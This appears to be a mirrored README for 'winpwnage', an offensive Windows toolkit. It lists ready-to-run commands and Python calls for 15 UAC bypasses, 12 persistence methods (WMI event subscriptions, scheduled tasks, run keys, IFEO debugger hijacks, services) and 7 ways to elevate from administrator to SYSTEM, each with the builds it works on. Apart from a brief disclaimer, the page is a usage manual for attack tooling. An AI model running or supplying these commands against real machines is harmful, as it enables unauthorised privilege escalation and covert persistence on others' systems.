GithubHelp home page GithubHelp logo

winpwnage's Introduction

build_status python3_support

Disclaimer

This tool is provided for educational and research purposes only. The authors of this project are no way responsible for any misuse of this tool.

Building

This build works on Python >= 3.6 and puts the .exe file into the dist directory. Install pyinstaller using pip command:

pip install pyinstaller

And run the following command:

pyinstaller --onefile main.py

Scanning

Compares build number against 'Fixed In' build numbers and displays the results.

main.py --scan uac
main.py --scan persist
main.py --scan elevate

Example results when scanning for possible UAC methods

 Id:    Type:           Compatible:     Description:
 ----   ------          -----------     -------------
 1      UAC bypass      No              UAC bypass using runas
 2      UAC bypass      Yes             UAC bypass using fodhelper.exe
 3      UAC bypass      Yes             UAC bypass using slui.exe
 4      UAC bypass      Yes             UAC bypass using silentcleanup scheduled task
 5      UAC bypass      No              UAC bypass using sdclt.exe (isolatedcommand)
 6      UAC bypass      No              UAC bypass using sdclt.exe (App Paths)
 7      UAC bypass      No              UAC bypass using perfmon.exe

Importing

Bypass UAC using uacMethod2

from winpwnage.functions.uac.uacMethod2 import uacMethod2
uacMethod2(["c:\\windows\\system32\\cmd.exe", "/k", "whoami"])

Persist on system using persistMethod4

from winpwnage.functions.persist.persistMethod4 import persistMethod4
persistMethod4(["c:\\windows\\system32\\cmd.exe", "/k", "whoami"], add=True)

# Removal
persistMethod4(["c:\\windows\\system32\\cmd.exe", "/k", "whoami"], add=False)

Elevate from administrator to SYSTEM using elevateMethod1

from winpwnage.functions.elevate.elevateMethod1 import elevateMethod1
elevateMethod1(["c:\\windows\\system32\\cmd.exe", "/k", "whoami"])

UAC bypass techniques

Functions (Expand/Collapse)
  • UAC bypass using runas
    • Id: 1
    • Method: Windows API, this only works if UAC is set to never notify
    • Syntax: main.py --use uac --id 1 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 7600
    • Fixed in: n/a
  • UAC bypass using fodhelper.exe
    • Id: 2
    • Method: Registry key (Class) manipulation
    • Syntax: main.py --use uac --id 2 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 10240
    • Fixed in: n/a
  • UAC bypass using slui.exe
    • Id: 3
    • Method: Registry key (Class) manipulation
    • Syntax: main.py --use uac --id 3 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 9600
    • Fixed in: n/a
  • UAC bypass using silentcleanup scheduled task
    • Id: 4
    • Method: Registry key (Environment) manipulation, this bypasses UAC's Always Notify.
    • Syntax: main.py --use uac --id 4 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 9600
    • Fixed in: n/a
  • UAC bypass using sdclt.exe (isolatedcommand)
    • Id: 5
    • Method: Registry key (Class) manipulation
    • Syntax: main.py --use uac --id 5 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 10240
    • Fixed in: 17025
  • UAC bypass using sdclt.exe (App Paths)
    • Id: 6
    • Method: Registry key (App Paths) manipulation
    • Syntax: main.py --use uac --id 6 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 10240
    • Fixed in: 16215
  • UAC bypass using perfmon.exe
    • Id: 7
    • Method: Registry key (Volatile Environment) manipulation
    • Syntax: main.py --use uac --id 7 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 7600
    • Fixed in: 16299
  • UAC bypass using eventvwr.exe
    • Id: 8
    • Method: Registry key (Class) manipulation
    • Syntax: main.py --use uac --id 8 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 7600
    • Fixed in: 15031
  • UAC bypass using compmgmtlauncher.exe
    • Id: 9
    • Method: Registry key (Class) manipulation
    • Syntax: main.py --use uac --id 9 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 7600
    • Fixed in: 15031
  • UAC bypass using computerdefaults.exe
    • Id: 10
    • Method: Registry key (Class) manipulation
    • Syntax: main.py --use uac --id 10 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 10240
    • Fixed in: n/a
  • UAC bypass using token manipulation
    • Id: 11
    • Method: Token manipulation
    • Syntax: main.py --use uac --id 11 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 7600
    • Fixed in: 17686
  • UAC bypass using sdclt.exe (Folder)
    • Id: 12
    • Method: Registry key (Class) manipulation
    • Syntax: main.py --use uac --id 12 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 14393
    • Fixed in: n/a
  • UAC bypass using cmstp.exe
    • Id: 13
    • Method: Malicious ini file
    • Syntax: main.py --use uac --id 13 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 7600
    • Fixed in: n/a
  • UAC bypass using wsreset.exe
    • Id: 14
    • Method: Registry key (Class) manipulation
    • Syntax: main.py --use uac --id 14 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 17134
    • Fixed in: n/a
  • UAC bypass using slui.exe and changepk.exe
    • Id: 15
    • Method: Registry key (Class) manipulation
    • Syntax: main.py --use uac --id 15 --payload c:\\windows\\system32\\cmd.exe
    • Works from: 17763
    • Fixed in: n/a

Persistence techniques

Functions (Expand/Collapse)
  • Persistence using mofcomp.exe (SYSTEM privileges)
    • Id: 1
    • Method: Malicious mof file using EventFilter EventConsumer and binding
    • Syntax: main.py --use persist --id 1 --payload c:\\windows\\system32\\cmd.exe
    • Syntax for removing: main.py --use persist --id 1 --payload c:\\windows\\system32\\cmd.exe --remove
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a
  • Persistence using schtasks.exe (SYSTEM privileges)
    • Id: 2
    • Method: Malicious scheduled task
    • Syntax: main.py --use persist --id 2 --payload c:\\windows\\system32\\cmd.exe
    • Syntax for removing: main.py --use persist --id 2 --payload c:\\windows\\system32\\cmd.exe --remove
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a
  • Persistence using image file execution option and magnifier.exe
    • Id: 3
    • Method: Image File Execution Options debugger and accessibility application
    • Syntax: main.py --use persist --id 3 --payload c:\\windows\\system32\\cmd.exe
    • Syntax for removing: main.py --use persist --id 3 --payload c:\\windows\\system32\\cmd.exe --remove
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a
  • Persistence using userinit key
    • Id: 4
    • Method: Registry key (UserInit) manipulation
    • Syntax: main.py --use persist --id 4 --payload c:\\windows\\system32\\cmd.exe
    • Syntax for removing: main.py --use persist --id 4 --payload c:\\windows\\system32\\cmd.exe --remove
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a
  • Persistence using HKCU run key
    • Id: 5
    • Method: Registry key (HKCU Run) manipulation
    • Syntax: main.py --use persist --id 5 --payload c:\\windows\\system32\\cmd.exe
    • Syntax for removing: main.py --use persist --id 5 --payload c:\\windows\\system32\\cmd.exe --remove
    • Requires: n/a
    • Works from: 7600
    • Fixed in: n/a
  • Persistence using HKLM run key
    • Id: 6
    • Method: Registry key (HKLM Run) manipulation
    • Syntax: main.py --use persist --id 6 --payload c:\\windows\\system32\\cmd.exe
    • Syntax for removing: main.py --use persist --id 6 --payload c:\\windows\\system32\\cmd.exe --remove
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a
  • Persistence using wmic.exe (SYSTEM privileges)
    • Id: 7
    • Method: Malicious mof file using EventFilter EventConsumer and binding
    • Syntax: main.py --use persist --id 7 --payload c:\\windows\\system32\\cmd.exe
    • Syntax for removing: main.py --use persist --id 7 --payload c:\\windows\\system32\\cmd.exe --remove
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a
  • Persistence using startup files
    • Id: 8
    • Method: Malicious lnk file in startup directory
    • Syntax: main.py --use persist --id 8 --payload c:\\windows\\system32\\cmd.exe
    • Syntax for removing: main.py --use persist --id 8 --payload c:\\windows\\system32\\cmd.exe --remove
    • Requires: n/a
    • Works from: 7600
    • Fixed in: n/a
  • Persistence using cortana windows app
    • Id: 9
    • Method: Registry key (Class) manipulation
    • Syntax: main.py --use persist --id 9 --payload c:\\windows\\system32\\cmd.exe
    • Syntax for removing: main.py --use persist --id 9 --payload c:\\windows\\system32\\cmd.exe --remove
    • Requires: n/a
    • Works from: 14393
    • Fixed in: n/a
  • Persistence using people windows app
    • Id: 10
    • Method: Registry key (Class) manipulation
    • Syntax: main.py --use persist --id 10 --payload c:\\windows\\system32\\cmd.exe
    • Syntax for removing: main.py --use persist --id 10 --payload c:\\windows\\system32\\cmd.exe --remove
    • Requires: n/a
    • Works from: 14393
    • Fixed in: n/a
  • Persistence using bitsadmin.exe
    • Id: 11
    • Method: Malicious bitsadmin job
    • Syntax: main.py --use persist --id 11 --payload c:\\windows\\system32\\cmd.exe
    • Syntax for removing: main.py --use persist --id 11 --payload c:\\windows\\system32\\cmd.exe --remove
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a
  • Persistence using Windows Service (SYSTEM privileges)
    • Id: 12
    • Method: Malicious Windows Service
    • Syntax: main.py --use persist --id 12 --payload c:\\windows\\system32\\cmd.exe
    • Syntax for removing: main.py --use persist --id 12 --payload c:\\windows\\system32\\cmd.exe --remove
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a

Elevation techniques

Functions (Expand/Collapse)
  • Elevate from administrator to NT AUTHORITY SYSTEM using handle inheritance
    • Id: 1
    • Method: Handle inheritance
    • Syntax: main.py --use elevate --id 1 --payload c:\\windows\\system32\\cmd.exe
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a
  • Elevate from administrator to NT AUTHORITY SYSTEM using token impersonation
    • Id: 2
    • Method: Token impersonation
    • Syntax: main.py --use elevate --id 2 --payload c:\\windows\\system32\\cmd.exe
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a
  • Elevate from administrator to NT AUTHORITY SYSTEM using named pipe impersonation
    • Id: 3
    • Method: Named pipe impersonation
    • Syntax: main.py --use elevate --id 3 --payload c:\\windows\\system32\\cmd.exe
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a
  • Elevate from administrator to NT AUTHORITY SYSTEM using schtasks.exe (non interactive)
    • Id: 4
    • Method: Malicious scheduled task that gets deleted once used
    • Syntax: main.py --use elevate --id 4 --payload c:\\windows\\system32\\cmd.exe
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a
  • Elevate from administrator to NT AUTHORITY SYSTEM using wmic.exe (non interactive)
    • Id: 5
    • Method: Malicious mof file using EventFilter EventConsumer and binding that gets deleted once used
    • Syntax: main.py --use elevate --id 5 --payload c:\\windows\\system32\\cmd.exe
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a
  • Elevate from administrator to NT AUTHORITY SYSTEM using Windows Service (non interactive)
    • Id: 6
    • Method: Malicious Windows Service that gets deleted once used
    • Syntax: main.py --use elevate --id 6 --payload c:\\windows\\system32\\cmd.exe
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a
  • Elevate from administrator to NT AUTHORITY SYSTEM using mofcomp.exe (non interactive)
    • Id: 7
    • Method: Malicious mof file using EventFilter EventConsumer and binding that gets deleted once used
    • Syntax: main.py --use elevate --id 7 --payload c:\\windows\\system32\\cmd.exe
    • Requires: Administrator rights
    • Works from: 7600
    • Fixed in: n/a

Read

winpwnage's People

Contributors

alessandroz avatar byehack avatar cclauss avatar coreb1t avatar rootm0s avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.